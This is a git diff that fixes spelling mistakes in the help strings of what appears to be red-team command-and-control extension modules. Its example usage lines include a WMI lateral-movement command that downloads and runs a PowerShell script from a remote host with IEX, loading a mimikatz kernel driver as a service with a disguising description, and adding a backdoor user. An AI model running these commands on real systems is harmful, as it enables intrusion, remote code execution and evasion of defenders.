diff --git a/InvokeAssembly/invokeassembly.py b/InvokeAssembly/invokeassembly.py index d4f143e..c22a539 100644 --- a/InvokeAssembly/invokeassembly.py +++ b/InvokeAssembly/invokeassembly.py @@ -37,4 +37,4 @@ def InvokeAssembly( demonID, *param ): return TaskID -RegisterCommand( InvokeAssembly, "dotnet", "execute", "executes a dotnet assembly in a seperate process", 0, "[/path/to/assembl.exe] (args)", "/tmp/Seatbelt.exe -group=user" ) +RegisterCommand( InvokeAssembly, "dotnet", "execute", "executes a dotnet assembly in a separate process", 0, "[/path/to/assembl.exe] (args)", "/tmp/Seatbelt.exe -group=user" ) diff --git a/Jump-exec/WMI/wmi.py b/Jump-exec/WMI/wmi.py index 8e3e970..440db0e 100644 --- a/Jump-exec/WMI/wmi.py +++ b/Jump-exec/WMI/wmi.py @@ -113,5 +113,5 @@ def wmi_proccreate( demonID, *params ): return TaskID RegisterModule( "jump-exec", "lateral movement module", "", "[exploit] (args)", "", "" ) -RegisterCommand( wmi_eventsub, "jump-exec", "wmi-eventsub", "Run a VBscript via WMI for lateral movement", 0, "target local_script_path ", "10.10.10.10 /tmp/demon.vba" ) -RegisterCommand( wmi_proccreate, "jump-exec", "wmi-proccreate", "Create a process via WMI for lateral movement", 0, "target command ", "10.10.10.10 \"powershell.exe (new-object system.net.webclient).downloadstring('http://192.168.49.100:8888/run.txt') | IEX\"" ) +RegisterCommand( wmi_eventsub, "jump-exec", "wmi-eventsub", "Run a VBscript via WMI for lateral movement", 0, "target local_script_path ", "10.10.10.10 /tmp/demon.vba" ) +RegisterCommand( wmi_proccreate, "jump-exec", "wmi-proccreate", "Create a process via WMI for lateral movement", 0, "target command ", "10.10.10.10 \"powershell.exe (new-object system.net.webclient).downloadstring('http://192.168.49.100:8888/run.txt') | IEX\"" ) diff --git a/RemoteOps/RemoteOps.py b/RemoteOps/RemoteOps.py index 55085f5..6468193 100644 --- a/RemoteOps/RemoteOps.py +++ b/RemoteOps/RemoteOps.py @@ -619,7 +619,7 @@ def adduser( demonID, *params ): return TaskID -RegisterCommand( adcs_request, "", "adcs_request", "Request an enrollment certificate", 0, "/CA:ca [/TEMPLATE:template] [/SUBJECT:subject] [/ALTNAME:altname] [/INSTALL] [/MACHINE]", "1337 c:\\windwos\\temp\\test.txt" ) +RegisterCommand( adcs_request, "", "adcs_request", "Request an enrollment certificate", 0, "/CA:ca [/TEMPLATE:template] [/SUBJECT:subject] [/ALTNAME:altname] [/INSTALL] [/MACHINE]", "1337 c:\\windows\\temp\\test.txt" ) RegisterCommand( addusertogroup, "", "addusertogroup", "Add the specified user to the specified group", 0, """ USERNAME Required. The user name to activate/enable. GROUPNAME Required. The group to add the user to. @@ -640,7 +640,7 @@ def adduser( demonID, *params ): the domain name for the user if it is a domain account, or use \"\" to target an account on the local machine.""", "pwnedUser Password123! computer132 \"\"" ) RegisterCommand( reg_delete, "", "reg_delete", "Deletes the registry key or value", 0, """ - HOSTNAME Optional. The host to connect to and run the commnad on. + HOSTNAME Optional. The host to connect to and run the command on. HIVE Required. The registry hive containing the REGPATH. Possible values: HKLM @@ -662,7 +662,7 @@ def adduser( demonID, *params ): FILEOUT Required. The output file. Note: The FILEOUT is saved to disk on target, so don't forget to clean up.""", "HKLM Some\\Path c:\\windows\\temp\\reg.txt" ) RegisterCommand( reg_set, "", "reg_set", "This command creates or sets the specified registry key (or value) on the target host.", 0, """ - HOSTNAME Optional. The host to connect to and run the commnad on. + HOSTNAME Optional. The host to connect to and run the command on. HIVE Required. The registry hive containing the REGPATH. Possible values: HKLM @@ -707,7 +707,7 @@ def adduser( demonID, *params ): 2 - SERVICE_KERNEL_DRIVER (Driver service) 3 - SERVICE_WIN32_OWN_PROCESS (Service that runs in its own process) <-- Default 4 - SERVICE_WIN32_SHARE_PROCESS (Service that shares a process with one or more other services) - HOSTNAME Optional. The host to connect to and run the commnad on. The + HOSTNAME Optional. The host to connect to and run the command on. The local system is targeted if a HOSTNAME is not specified.""", "mimidrv mimidrv C:\\Windows\\Temp\\mimidrv.sys \"\" 0 3 2" ) RegisterCommand( sc_start, "", "sc_start", "This command starts the specified service on the target host.", 0, """ SVCNAME Required. The name of the service to start. @@ -715,16 +715,16 @@ def adduser( demonID, *params ): local system is targeted if a HOSTNAME is not specified.""", "mimidrv" ) RegisterCommand( sc_stop, "", "sc_stop", "This command stops the specified service on the target host.", 0, """ SVCNAME Required. The name of the service to stop. - HOSTNAME Optional. The host to connect to and run the commnad on. The + HOSTNAME Optional. The host to connect to and run the command on. The local system is targeted if a HOSTNAME is not specified.""", "mimidrv" ) RegisterCommand( sc_delete, "", "sc_delete", "This command deletes the specified service on the target host.", 0, """ SVCNAME Required. The name of the service to delete. - HOSTNAME Optional. The host to connect to and run the commnad on. The + HOSTNAME Optional. The host to connect to and run the command on. The local system is targeted if a HOSTNAME is not specified.""", "mimidrv" ) RegisterCommand( sc_description, "", "sc_description", "This command sets the description of an existing service on the target host.", 0, """ SVCNAME Required. The name of the service to create. DESCRIPTION Required. The description of the service. - HOSTNAME Optional. The host to connect to and run the commnad on. The + HOSTNAME Optional. The host to connect to and run the command on. The local system is targeted if a HOSTNAME is not specified.""", "mimidrv \"definitely not a mimikatz kernel driver\"" ) RegisterCommand( adduser, "", "adduser", "Add a new user to a machine.", 0, """ USERNAME Required. The name of the new user. diff --git a/SituationalAwareness/SituationalAwareness.py b/SituationalAwareness/SituationalAwareness.py index 37f5e1c..a5225c9 100644 --- a/SituationalAwareness/SituationalAwareness.py +++ b/SituationalAwareness/SituationalAwareness.py @@ -1468,7 +1468,7 @@ def sa_tasklist( demonID, *params ): RegisterCommand( schtasksenum, "", "schtasksenum", "Enumerate scheduled tasks on the local or remote computer", 0, "[opt: server]", "" ) RegisterCommand( schtasksquery, "", "schtasksquery", "Query the given task on the local or remote computer", 0, "[opt: server] [taskpath]", "" ) RegisterCommand( sc_enum, "", "sc_enum", "Enumerate services for qc, query, qfailure, and qtriggers info", 0, "[opt: server]", "" ) -RegisterCommand( sc_qc, "", "sc_qc", "sc qc impelmentation in BOF", 0, "service_name [opt:server]", "SensorService" ) +RegisterCommand( sc_qc, "", "sc_qc", "sc qc implementation in BOF", 0, "service_name [opt:server]", "SensorService" ) RegisterCommand( sc_query, "", "sc_query", "sc query implementation in BOF", 0, "[opt: service name] [opt: server]", "" ) RegisterCommand( sc_qdescription, "", "sc_qdescription", "Queries a services description", 0, "service_name [opt: server]", "SensorService" ) RegisterCommand( sc_qfailure, "", "sc_qfailure", "Query a service for failure conditions", 0, "service_name [opt: server]", "SensorService" ) @@ -1476,7 +1476,7 @@ def sa_tasklist( demonID, *params ): RegisterCommand( adcs_enum, "", "adcs_enum", "Enumerate CAs and templates in the AD using Win32 functions", 0, "[opt: domain]", "" ) RegisterCommand( enumlocalsessions, "", "enumlocalsessions", "Enumerate currently attached user sessions both local and over RDP", 0, "", "" ) RegisterCommand( enum_filter_driver, "", "enum_filter_driver", "Enumerate filter drivers", 0, "[opt: system]", "" ) -RegisterCommand( ldapsearch, "", "ldapsearch", "Execute LDAP searches (NOTE: specify *,ntsecuritydescriptor as attribute parameter if you want all attributes + base64 encoded ACL of the objects, this can then be resolved using BOFHound. Could possibly break pagination, although everything seemed fine during testing.)", 0, "query [opt: attribute] [opt: results_limit] [opt: DC hostname or IP] [opt: Distingished Name]", "\"(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))\"" ) +RegisterCommand( ldapsearch, "", "ldapsearch", "Execute LDAP searches (NOTE: specify *,ntsecuritydescriptor as attribute parameter if you want all attributes + base64 encoded ACL of the objects, this can then be resolved using BOFHound. Could possibly break pagination, although everything seemed fine during testing.)", 0, "query [opt: attribute] [opt: results_limit] [opt: DC hostname or IP] [opt: Distinguished Name]", "\"(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))\"" ) RegisterCommand( netsession, "", "get-netsession", "Enumerate sessions on the local or specified computer", 0, "[opt:computer]", "" ) RegisterCommand( netGroupList, "", "netGroupList", "List groups from the default or specified domain", 0, "[opt: domain]", "" ) RegisterCommand( netGroupListMembers, "", "netGroupListMembers", "List group members from the default or specified domain", 0, "groupname [opt: domain]", "" ) @@ -1490,6 +1490,6 @@ def sa_tasklist( demonID, *params ): RegisterCommand( netsharesAdmin, "", "netsharesAdmin", "List shares on local or remote computer and gets more info then standard netshares (requires admin)", 0, "[opt: \\\\computername]", "" ) RegisterCommand( netuptime, "", "netuptime", "Returns information about the boot time on the local (or a remote) machine", 0, "[opt: hostname]", "" ) RegisterCommand( netview, "", "netview", "lists local workstations and servers", 0, "[opt: netbios_domain_name]", "" ) -RegisterCommand( quser, "", "quser", "Simple implementation of quser.exe usingt the Windows API", 0, "", "10.10.10.10" ) +RegisterCommand( quser, "", "quser", "Simple implementation of quser.exe using the Windows API", 0, "", "10.10.10.10" ) #RegisterCommand( bofdir, "", "bofdir", "Lists a target directory using BOF.", 0, "[directory] [/s]", "C:\\Windows\\Temp" ) RegisterCommand( sa_tasklist, "", "tasklist", "This command displays a list of currently running processes on either a local or remote machine.", 0, "[hostname]", "" )